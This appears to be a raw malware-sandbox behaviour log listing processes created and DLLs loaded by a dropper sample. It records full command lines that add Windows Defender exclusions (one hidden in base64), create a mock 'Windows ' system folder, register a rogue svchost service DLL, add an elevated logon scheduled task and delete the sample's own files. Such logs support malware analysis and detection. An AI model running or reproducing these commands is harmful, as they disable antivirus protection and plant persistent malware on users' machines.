    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x610437
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bav64.exe "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\dYUteuvmHn.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c rmdir /s /q "C:\Windows \"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f && sc start x610437Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\bav64.exe"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x610437
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bav64.exe "C:\Windows\System32\bav64.exe"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\bav64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'"
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'"
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: libcurl.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: zlib1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: libcurl.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: zlib1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: libcurl.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: zlib1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: printui.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
